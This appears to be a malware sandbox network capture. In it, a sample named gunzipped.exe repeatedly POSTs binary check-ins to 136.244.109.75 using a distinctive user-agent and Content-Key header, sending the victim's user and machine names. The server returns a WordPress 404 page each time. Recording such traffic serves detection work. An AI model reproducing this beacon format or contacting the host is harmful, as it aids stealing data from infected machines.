                          Apr 17, 2024 03:17:35.881575108 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:35.881664991 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:35.881704092 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:35.881743908 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:35.881783962 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:35.881824970 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:35.881865025 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:35.881903887 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:35.881944895 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.549741136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:36.230211020 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:36.438620090 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:37.412234068 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:36 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:37.412298918 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:37.412337065 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:37.412374973 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:37.412411928 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:37.412450075 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:37.412491083 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:37.412528038 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:37.412570000 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:37.412610054 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination Port
                          30192.168.2.549742136.244.109.7580
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:37.986052990 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:38.194777012 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:39.132791042 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:38 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:39.132837057 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:39.132874966 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:39.132913113 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:39.132955074 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
